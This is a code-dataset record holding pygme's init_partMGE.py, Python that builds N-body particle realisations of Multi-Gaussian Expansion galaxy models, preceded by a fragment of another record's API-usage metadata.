{"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": 
"seaborn.despine", "line_number": 160, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "seaborn.despine", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}]}
+{"seq_id": "296870774", "text": "try:\n import numpy as np\nexcept ImportError:\n raise Exception(\"numpy is required for pygme\")\n\nfrom numpy import asarray\nfrom numpy import cos, sin, sqrt, arctan\n\ntry:\n from scipy import interpolate\nexcept ImportError:\n raise Exception(\"scipy is required for pygme\")\n\nimport os\nfrom .rwcfor import floatMGE\nfrom pygme.dynMGE import dynMGE\nfrom pygme.paramMGE import dynParamMGE\nfrom pygme.mge_miscfunctions import sample_trunc_r2gauss, sample_trunc_gauss\n\n__version__ = '2.0.4 (24/10/2014)' # Changed default value for SigmaGas and fixed comment in realise_Nbody\n#__version__ = '2.0.3 (21/08/2013)' \n#__version__ = '2.0.2 (16/01/2013)'\n# Version 2.0.3: Changed imin imax into ilist\n# Version 2.0.2: 16/01/2013 - Simplification in the derivation of sigR, sigZ, sigTheta\n# Version 2.0.1: 18/12/2012 - Adding the FacBetaEps factor as a parameter of the realise_Nbody routine\n\nclass nbodyMGE(dynMGE) :\n def __init__(self, infilename=None, indir=None, saveMGE=None, **kwargs) :\n dynMGE.__init__(self, infilename=infilename, indir=indir, saveMGE=saveMGE, **kwargs)\n\n########################################### N BODY #############################################\n ################################################################\n ### Generate N bodies consistent with the existing MGE model ###\n ################################################################\n def realise_Nbody(self, **kwargs):\n \"\"\" Generate particles within the potential defined by the MGE model\n Cuts in R and Z, in pc, are defined by Rcut and Zcut\n The number of particles and the way the particles have their\n dynamics derived is specified in the Ascii input MGE model\n (e.g. NGROUP, NDYNCOMP, NPARTGROUP1, 2, ...)\n Anisotropy can be specified in the input Ascii Model with\n numbers (if negative, the Spin will be reversed), 'epicycle' or 'betaeps'\n Rcut: cut in R, in pc - default is 50000\n Zcut: cut in Z, in pc - default is 50000\n mcut: cut in ellipsoidal coordinates, in pc (think of this as an ellipsoid with major-axis max radius = mcut )\n Default is 50000\n ComputeV: Boolean (True/False), if True (default) velocities are derived, otherwise only the positions\n GasDisk: Boolean (True/False), if True (default) the Gas component will have velocities compatible with a thin disk\n Otherwise, we will follow the prescription given by the kRZ and kRTheta components in the mge file\n SigmaGas: SigmaR, SigmaTheta and SigmaZ for the Gas, in km/s - default to 10 km/s for all 3 values\n TruncationMethod : Method to sample the positions.\n \"Ellipsoid\" (default): will follow the isosurface of each Gaussians at that radius as a cut\n mcut will be used (in pc)\n \"Cylindre\" means an R, Z Cylindrical cal (Rcut, Zcut will be used - in pc)\n Add_BHParticle : boolean, if defined (Default is True):\n True means that a BH particle is added if Mbh > 0\n False means that if Mbh > 0, the potential will take it\n into account but no particle is added\n Softening: in pc, softening added in quadrature to the gaussian Sigmas for the potential, Default is 0 (no softening)\n FacBetaEps : factor involved when using the BETAEPS option as an anisotropy parameter for the\n Gaussians. When one of the Gaussian component is using BETAEPS for K_R_Z, we fix the\n anisotropy to -> delta = FacBetaEps * Epsilon where delta = 1 - Sigma_Z^2/Sigma_R^2 and\n Epsilon is the intrinsic ellipticity of that Gaussian. 
Setting FacBetaEps >= 0.8 is not\n permitted (as this would break the requirement on the second order moments).\n\n verbose: default is 1, will print some more information\n \"\"\"\n import time\n\n ## Checking a Few things before starting ########################\n if self.nGauss <= 0 :\n print('ERROR: NGAUSS is not right (= %d)' %self.nGauss)\n return\n if self.TtruncMass <= 0:\n print('ERROR: Mass of the model (= %g) is not right' %self.TtruncMass)\n return\n opGAS = (self.nGasGauss != 0)\n opSTAR = (self.nStarGauss != 0)\n opHALO = (self.nHaloGauss != 0)\n\n ## Number of Groups -------------------------##\n if self.nGroup == 0:\n print(\"ERROR: nGroup is 0\")\n return\n if self.nDynComp == 0:\n print(\"ERROR: nDynComp is 0\")\n return\n\n ## Some options from kwargs -- INITIALISATION -------------------------------------- ##\n ##--- Compute only positions or also velocities ? ---##\n ComputeV = kwargs.get('ComputeV', True)\n GasDisk = kwargs.get('GasDisk', True)\n ## Get the dispersion for the gas in km/s -----------##\n (self.SigRGas, self.SigThetaGas, self.SigZGas) = kwargs.get('SigmaGas',(10.0,10.0,10.0))\n ## Add a BH particle or not? --- ##\n self.Add_BHParticle = kwargs.get('Add_BHParticle', True)\n ## Overwrite mode : 'o' or None ------------------------ ##\n self.overwrite = kwargs.get('overwrite', None)\n ## First Realised Particle, and Max number of Particle -- ##\n self.FirstRealisedPart = np.int(kwargs.get('FirstRealisedPart', 0))\n self.nMaxPart = np.int(kwargs.get('nMaxPart', 0))\n ## Softening -- default is 0 (no softening)--------- ##\n self.Softening = kwargs.get('Softening', 0.0)\n ## Verbose: default is 1 ----------##\n verbose = kwargs.get('verbose', 1)\n ## -------------------------------------------------------------------------------------##\n\n ## Softening in pc----------------------------------##\n if self.Softening > 0. :\n print(\"WARNING: Softening will be %g (pc) !!!\"%(self.Softening))\n self.Softarc = self.Softening / self.pc_per_arcsec # Softening in Arcseconds\n self.SoftarcMbh = self.Softarc # best approx for Mbh smoothing\n self.SoftarcMbh2 = self.SoftarcMbh**2\n\n ## -- Method for Truncating the Density distribution of particles ---##\n self.TruncationMethod = kwargs.get('TruncationMethod', 'Ellipsoid')\n if self.TruncationMethod == \"Cylindre\" :\n self.Rcut = kwargs.get('Rcut', 50000)\n self.Zcut = kwargs.get('Zcut', 50000)\n Xcut = self.Rcut\n self.Rcutarc = self.Rcut / self.pc_per_arcsec\n self.Zcutarc = self.Zcut / self.pc_per_arcsec\n elif self.TruncationMethod == \"Ellipsoid\" :\n self.mcut = kwargs.get('mcut', 50000)\n Xcut = self.mcut\n self.mcutarc = self.mcut / self.pc_per_arcsec\n else :\n print(\"ERROR: TruncationMethod should be Cylindre or Ellipsoid. 
not %s\" %(self.TruncationMethod))\n return\n\n ## We first save the MGE file for archival purposes, as well as the initial parameters\n self.RealisationTime = time.time()\n dest_filename = self.saveMGE + \"/\" + \"%s_\"%(str(self.RealisationTime)) + self.MGEname\n if os.path.isfile(dest_filename) & (str(self.overwrite).lower() != \"o\") :\n print(\"ERROR: filename already exists in Archival Directory %s\"%(dest_filename))\n print(\" Please use overwrite mode (O) or provide a different output directory (saveMGE)\")\n return\n os_command = \"cp %s %s\"%(self.fullMGEname, dest_filename)\n os.system(os_command)\n #--------------------------------------------------------------------------------------#\n\n ## Save the command into a file with the same time\n text = \"init_nbody(Rcut=%g, Zcut=%g, mcut=%g, ComputeV=%d, GasDisk=%s, SigRGas=%g, SigThetaGas=%g, SigZGas=%g, TruncationMethod=%s, Add_BHParticle=%r, FirstRealisedPart=%r, nMaxPart=%r, overwrite=%r)\\n\"%(self.Rcut, self.Zcut, self.mcut, ComputeV, GasDisk, self.SigRGas, self.SigThetaGas, self.SigZGas, self.TruncationMethod, self.Add_BHParticle, self.FirstRealisedPart, self.nMaxPart, self.overwrite)\n fout = open(self.saveMGE + \"/\" + \"%s\"%(str(self.RealisationTime)) + \".MGE_CI\", \"w+\")\n fout.write(text)\n fout.close()\n #-------------------------------------------------#\n\n ## Get all parameters right and the number of particles too\n self._comp_Nparticles()\n\n #==============================================================================================================\n ## End of parameter initialisation\n #==============================================================================================================\n ## Beginning of allocation\n #==============================================================================================================\n\n self.R = np.zeros(self.nRealisedPart, floatMGE)\n self.theta = np.zeros(self.nRealisedPart, floatMGE)\n self.z = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.x = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.y = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.BodGroup = np.zeros(self.nRealisedPart, int)\n self.BodGauss = np.zeros(self.nRealisedPart, int)\n self.BodMass = np.zeros(self.nRealisedPart, floatMGE)\n ## Add the mass of the particle at 0,0,0 0,0,0 (last particle)\n if self.nRealisedPartBH == 1 :\n self.BodMass[-1] = self.Mbh\n\n ## Allocation for particles dynamics ############################\n self.NSpin = np.ones(self.nRealisedPart, floatMGE)\n self.NkRTheta = np.zeros(self.nRealisedPart, floatMGE)\n self.NkRZ = np.zeros(self.nRealisedPart, floatMGE)\n\n # Now: how do we derive sigma_R or sigma_Theta\n if self.epicycle.any() : ## Theta will be derived from sigma_R with the epicycle approximation\n R = np.linspace(0., Xcut, 1000) ## Derive a range of R in parsec\n epiratio = self.EpicycleRatio(R / self.pc_per_arcsec) # R is passed in arcsec\n # Function to have from R in pc, sigma_R / sigma_Theta from the epicycle approximation\n funcEpiratio = interpolate.interp1d(R, epiratio)\n\n ## Now we implement (if betaeps=1) the relation beta = 0.6 * eps\n ## Only if specified\n if 'FacBetaEps' in kwargs :\n self.FacBetaEps = kwargs.get('FacBetaEps', 0.6)\n self._init_BetaEps(verbose=True)\n\n ## Derive required values from the anisotropy kRZ2 (sig_R2/ sig_z2)\n self._dParam = dynParamMGE(self)\n\n ############### Computing POSITIONS for the N body realisation ##################\n # for each Gaussian, derive initial positions for 
particles\n ## Only do this if it is axisymmetric\n if self.axi == 1 :\n\n ##################################### BEGIN STARS, GAS, HALO ######################################\n self.Spin = np.ones(self.nGauss, np.int)\n for i in range(self.nGauss) :\n sigma = self.Sig3D[i]\n\n if self.TruncationMethod == \"Cylindre\" :\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n sigma = self.Sig3D[i]*self.QxZ[i]\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Zcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = asarray(np.random.uniform(0., 2.*np.pi, size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n elif self.TruncationMethod == \"Ellipsoid\" :\n r = sample_trunc_r2gauss(sigma=sigma, cutr=self.mcut, npoints=self.nRealisedPartGauss[i])\n U = asarray(np.random.uniform(-1., 1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n V = asarray(np.random.uniform(0.,1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n sqU = np.sqrt(1. - U*U)\n theta = 2. * np.pi * V\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*cos(theta)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*sin(theta)\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r * U * self.QxZ[i]\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = theta\n\n self.BodGauss[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = i+1\n self.BodGroup[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.GaussDynCompNumber[i]\n self.BodMass[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.pmassGauss[i]\n\n ## We set up things so that at the end we have kRZ and kRTheta\n ## First we test if one of the set up variable is negative, which means that we should inverse the Spin\n if (self.kRTheta[i] < 0) :\n self.kRTheta[i] = np.abs(self.kRTheta[i])\n self.Spin[i] = -1\n self.NSpin[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = - np.ones(self.nRealisedPartGauss[i], dtype=floatMGE)\n\n self.NkRZ[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRZ[i]\n if self.epicycle[i] :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = funcEpiratio(self.R[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]])\n else :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRTheta[i]\n\n print(\"NStar = %d particles Realised over a total of %d\" %(self.nRealisedPartStar, self.nPartStar))\n print(\"NGas = %d particles Realised over a total of %d\" %(self.nRealisedPartGas, self.nPartGas))\n print(\"NHalo = %d particles Realised over a total of %d\" %(self.nRealisedPartHalo, self.nPartHalo))\n if self.nRealisedPartBH == 1:\n print(\"Adding a BH particle of %e Msun\" %(self.Mbh))\n firstStar = 0 # index for the first Star particle\n firstGas = lastStar = self.nRealisedPartStar # index for the first Gas particle - last Star particle\n firstHalo = lastGas = firstGas + self.nRealisedPartGas # index for the first Halo particle - last Gas particle\n firstBH = lastHalo = firstHalo + self.nRealisedPartHalo # index for the BH particle - last 
Halo particle\n ##################################### END STARS, GAS, HALO ######################################\n\n ## Computing some important quantities : R, r, theta, xarc etc ------------------------- ##\n self.R = sqrt(self.x**2 + self.y**2)\n ## And r spherical\n self.r = sqrt(self.x**2 + self.y**2+self.z**2)\n\n ## Now computing the true theta\n self.theta[(self.x == 0.) & (self.y >= 0.)] = np.pi / 2.\n self.theta[(self.x == 0.) & (self.y < 0.)] = -np.pi / 2.\n self.theta[(self.x < 0.)] = arctan(self.y[(self.x < 0.)] / self.x[(self.x < 0.)]) + np.pi\n self.theta[(self.x > 0.)] = arctan(self.y[(self.x > 0.)] / self.x[(self.x > 0.)])\n\n ### Transforming in arcsecond\n self.xarc = self.x / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.yarc = self.y / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.zarc = self.z / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.Rarc = self.R / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.rarc = self.r / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n\n R2 = (self.Rarc)**2 ## R in arcsec\n Z2 = (self.zarc)**2 ## z in arcsec\n\n ############### Computing velocities for the N body realisation ##################\n if ComputeV :\n ### Integration using gaussian quadrature ###\n ### First compute the gaussian quadrature points, and weights\n print(\"Starting the derivation of velocities\")\n self.muTheta2 = np.zeros(self.nRealisedPart, floatMGE)\n self.sigz = np.zeros(self.nRealisedPart, floatMGE)\n self.sigR = np.zeros(self.nRealisedPart, floatMGE)\n self.sigT = np.zeros(self.nRealisedPart, floatMGE)\n self.vt = np.zeros(self.nRealisedPart, floatMGE)\n if verbose :\n print(\"End of memory alloc\")\n\n##### OPTION REMOVE if self.GLOBAL_Sigma == False :\n ## Doing it in Dynamical groups #################################\n if verbose :\n print(\"STARTING Local Sigma for each Dynamical Group\")\n ## First check that Dynamical Groups are ordered\n setGauss_Stars = list(range(self.nStarGauss))\n setGauss_Halo = list(range(self.nStarGauss + self.nGasGauss, self.nGauss))\n setGauss = np.concatenate((setGauss_Stars, setGauss_Halo))\n nRealisedPart = self.nRealisedPartStar + self.nRealisedPartHalo\n ## First derive the equations for each INDIVIDUAL DYNAMICAL GROUP for SIGMA_Z\n if nRealisedPart != 0 :\n for i in range(self.nDynComp) :\n iminG = np.min(self.listGaussDynComp[i])\n imaxG = np.max(self.listGaussDynComp[i])\n if (iminG >= self.nStarGauss) & (imaxG < self.nStarGauss+self.nGasGauss) & GasDisk:\n continue\n for j in range(iminG+1, imaxG) :\n if j not in self.listGaussDynComp[i] :\n print(\"ERROR: Dynamical Group %d should included ordered Gaussians\"%(i+1))\n print(\"ERROR: Dynamical Group %d is \"%(i+1),self.listGaussDynComp[i])\n return\n\n startI, endI = self.nRealisedPartCum[iminG], self.nRealisedPartCum[imaxG+1]\n if endI <= startI :\n continue\n R2comp = R2[startI: endI]\n Z2comp = Z2[startI: endI]\n self.rho, self.rhoT = self._MassDensity(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n temp1, temp2 = self._sigmaz2_muTheta2_fromR2Z2(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.sigz[startI: endI] = sqrt(temp1)\n self.muTheta2[startI: endI] = temp2\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Dynamical Group %02d\"%(i+1))\n\n##### REMOVING THIS OPTION - NOT REQUIRED CONSIDERING THE INPUT ASCII FILE WITH DYN GROUPS ###### 
else :\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"STARTING GLOBAL Sigma for All Stars and then Halo\"\n#### OPTION REMOVED ###### ## STARS ####################\n#### OPTION REMOVED ###### R2Star = R2[firstStar:lastStar]\n#### OPTION REMOVED ###### Z2Star = Z2[firstStar:lastStar]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = 0\n#### OPTION REMOVED ###### imax = self.nStarGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Stars\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstStar:lastStar] = temp1\n#### OPTION REMOVED ###### self.mut2[firstStar:lastStar] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Stars\"\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## HALO ####################\n#### OPTION REMOVED ###### R2Halo = R2[firstHalo:lastHalo]\n#### OPTION REMOVED ###### Z2Halo = Z2[firstHalo:lastHalo]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = self.nStarGauss + self.nGasGauss\n#### OPTION REMOVED ###### imax = self.nGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Halos\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstHalo:lastHalo] = temp1\n#### OPTION REMOVED ###### self.mut2[firstHalo:lastHalo] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Halo\"\n\n ## Using only kRZ and kRTheta\n sigR = self.sigz * self.NkRZ\n sigTheta = np.minimum(sqrt(self.muTheta2), sigR / self.NkRTheta) # sigma Theta from sigma R\n vt = sqrt(np.clip(self.muTheta2 - sigTheta**2, 0., np.inf))\n self.sigR[firstStar:lastStar] = sigR[firstStar:lastStar] # sigma R from sigma Z\n self.sigR[firstHalo:lastHalo] = sigR[firstHalo:lastHalo] # sigma R from sigma Z\n self.sigT[firstStar:lastStar] = sigTheta[firstStar:lastStar] # sigma Theta from sigma R\n self.sigT[firstHalo:lastHalo] = sigTheta[firstHalo:lastHalo] # sigma Theta from sigma R\n # Mean V theta\n self.vt[firstStar:lastStar] = vt[firstStar:lastStar]\n self.vt[firstHalo:lastHalo] = vt[firstHalo:lastHalo]\n if not GasDisk :\n self.sigR[firstGas:lastGas] = sigR[firstGas:lastGas] # sigma R from sigma Z\n self.sigT[firstGas:lastGas] = sigTheta[firstGas:lastGas] # sigma Theta from sigma R\n self.vt[firstGas:lastGas] = vt[firstGas:lastGas]\n if verbose :\n if GasDisk :\n print(\"End of sigz2 and mu2 derivation for All Stars and Halo particles\")\n else :\n print(\"End of sigz2 and mu2 derivation for All Stars, Gas and Halo particles\")\n\n ## GAS ######################\n if opGAS & GasDisk:\n self.vt[firstGas:lastGas] = self.Vcirc(self.Rarc[firstGas:lastGas])\n self.muTheta2[firstGas:lastGas] = self.vt[firstGas:lastGas]**2 + self.SigThetaGas**2\n temp = np.zeros_like(self.sigR[firstGas:lastGas])\n self.sigR[firstGas:lastGas] = temp + self.SigRGas # sigma R for the Gas\n self.sigT[firstGas:lastGas] = temp + 
self.SigThetaGas # sigma Theta for the Gas\n self.sigz[firstGas:lastGas] = temp + self.SigZGas # sigma Z for the Gas\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Gas\")\n\n ## Changing the spin of the component\n self.vt *= self.NSpin\n\n ## Starting the randomization of velocities using the derived V and Sigma values\n print(\"Randomizing the Velocities\")\n Vescape = self.Vescape(self.Rarc,self.zarc) # Vescape : cut it if the total velocity is higher\n Nrejected = 0\n Nstart = 0\n Nremain = self.nRealisedPart\n ind = list(range(self.nRealisedPart))\n self.Vz = np.zeros(self.nRealisedPart, floatMGE)\n self.VR = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtheta = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtot = np.zeros(self.nRealisedPart, floatMGE)\n iter = 0\n while Nremain != 0 :\n ### Randomize the positions taking into account the 3D width of the Gaussian\n self.Vz[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigz[ind]\n self.VR[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigR[ind]\n self.Vtheta[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigT[ind] + self.vt[ind]\n\n self.Vtot[ind] = sqrt(self.Vz[ind]**2 + self.VR[ind]**2 + self.Vtheta[ind]**2)\n\n ind = np.ravel(np.where(self.Vtot[ind] > Vescape[ind])) # indices which are NOT ok with Vesc\n nrealised = Nremain - ind.size\n Nstart = Nstart+nrealised\n Nremain = ind.size\n iter += 1\n print(\"NtotalV = %d, Nrealised = %d, Nremaining = %d, Iter = %d\" %(Nstart, nrealised, Nremain, iter))\n Nrejected += Nremain\n\n print(\"Rejected (recalculated) points above Vescape: %d\" %(Nrejected))\n\n self.Vx = self.VR * cos(self.theta) - self.Vtheta * sin(self.theta)\n self.Vy = self.VR * sin(self.theta) + self.Vtheta * cos(self.theta)\n\n return\n\n############################################################################################################\n####################################### END OF NBODY REALIZATION ###########################################\n############################################################################################################\n\n def comp_Pot(self) :\n self.EcPot = self.Pot(self.Rarc, self.zarc)\n self.EcPotT = np.sum(self.EcPot)\n return\n\n def comp_Ep(self) :\n print(\"==== Potential Energy ====\")\n print(\"WARNING: this is a direct computation of the potential energy: can be time consuming!\")\n self.Ep = np.zeros(self.nRealisedPart, floatMGE)\n for i in range(self.nRealisedPart) :\n Ep = np.sum(concatenate((1./sqrt((self.x[:i] - self.x[i])**2 + (self.y[:i] - self.y[i])**2 + (self.z[:i] - self.z[i])**2), 1./sqrt((self.x[i+1:] - self.x[i])**2 + (self.y[i+1:] - self.y[i])**2 + (self.z[i+1:] - self.z[i])**2))),axis=0)\n self.Ep[i] = - Ep * self.Gorig * self.BodMass**2\n\n self.EpT = np.sum(self.Ep,axis=0) / 2.\n return\n\n def comp_Ec(self) :\n print(\"==== Kinetic Energy ====\")\n self.Ec = 0.5 * self.BodMass * (self.Vx**2 + self.Vy**2 + self.Vz**2)\n self.EcT = np.sum(self.Ec,axis=0)\n return\n\n ################## Projection of the MGE model ################\n def projpart(self, inclin=90.) 
:\n \"\"\" Projection of an MGE realization (N particles) using a defined inclination\n inclin: inclination in degrees, 90 being edge-on, 0 being face-on\n \"\"\"\n\n inclin_rad = inclin * np.pi / 180.\n self.Xp = self.x\n self.Yp = self.y * cos(inclin_rad) + self.z * sin(inclin_rad)\n self.Zp = - self.y * sin(inclin_rad) + self.z * cos(inclin_rad)\n self.Xparc = self.Xp / self.pc_per_arcsec\n self.Yparc = self.Yp / self.pc_per_arcsec\n self.Zparc = self.Zp / self.pc_per_arcsec\n\n self.Vrad = self.Vy * sin(inclin_rad) - self.Vz * cos(inclin_rad)\n\n return\n #===================================================================\n\n ##################################################################\n ### Save the Nbody coordinates x,y,z,Vx,Vy,Vz in an ascii file #\n ##################################################################\n def save_nbody(self, outdir=None, outfilename=None, overwrite=False, arcsec=False) :\n \"\"\" Save the N body realization of an MGE model into an ascii file\n outfilename : string defining the name of the output file\n overwrite: if file exists, overwrite or not - default = False\n arcsec: save the positions in arcseconds or pc - default= False (pc)\n \"\"\"\n if outfilename is None :\n print(\"You must specify an output ascii file\")\n return\n\n if outdir is not None :\n outfilename = outdir + outfilename\n\n if os.path.isfile(outfilename) and not overwrite : # testing the existence of the file\n print('WRITING ERROR: File %s already exists, use overwrite=True if you wish' %outfilename)\n return\n\n ascii_file = open(outfilename, mode=\"w\")\n\n if arcsec :\n outx = self.xarc\n outy = self.yarc\n outz = self.zarc\n else :\n outx = self.x\n outy = self.y\n outz = self.z\n\n for i in range(self.nRealisedPart) :\n line = \"%12.5e %12.5e %12.5e %12.5e %12.5e %12.5e %12.5e \\n\" %(outx[i], outy[i], outz[i], self.Vx[i], self.Vy[i], self.Vz[i], self.BodMass[i])\n ascii_file.write(line)\n\n ascii_file.close() # actually close the file (the call parentheses were missing, so the file was never closed)\n return\n #===================================================================\n", "sub_path": "pygme/init_partMGE.py", "file_name": "init_partMGE.py", "file_ext": "py", "file_size_in_byte": 30045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygme.dynMGE.dynMGE", "line_number": 27, "usage_type": "name"}, {"api_name": "pygme.dynMGE.dynMGE.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "pygme.dynMGE.dynMGE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 158, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 159, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 160, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 161, "usage_type": "argument"}, {"api_name": 
"numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 162, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 165, "usage_type": "argument"}, {"api_name": "numpy.ones", "line_number": 171, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 171, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 173, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 173, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 180, "usage_type": "name"}, {"api_name": "pygme.paramMGE.dynParamMGE", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 202, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 203, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 206, "usage_type": "name"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_r2gauss", "line_number": 208, "usage_type": 